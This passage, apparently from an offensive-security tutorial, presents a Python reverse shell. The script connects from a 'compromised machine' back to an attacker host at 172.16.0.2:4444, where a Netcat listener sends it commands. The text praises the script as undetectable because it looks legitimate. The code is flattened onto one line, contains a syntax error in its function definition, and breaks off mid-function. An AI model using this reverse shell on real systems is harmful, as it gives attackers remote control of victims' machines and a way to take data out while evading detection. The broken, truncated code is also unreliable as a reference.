The following script we're going to create leverages the use of raw sockets to exfiltrate data from a network. The general idea of this shell is to create a connection between the compromised machine and your own machine through a Netcat (or other program) session and send commands to the machine this way.
The beauty of this Python script is the undetectable nature of it, as it appears as a completely legitimate script.
This is the script that will establish a connection through Netcat and read the input:
import socket import subprocess import sys import time HOST = '172.16.0.2' # Your attacking machine to connect back to PORT = 4444 # The port your attacking machine is listening on def connect((host, port)): go = socket.socket(socket.AF_INET, socket.SOCK_STREAM) go.connect((host, port)) return go def wait(go): data = go.recv(1024) if data == "exit\n": go.close() sys.exit(0) elif len(data)==0: return...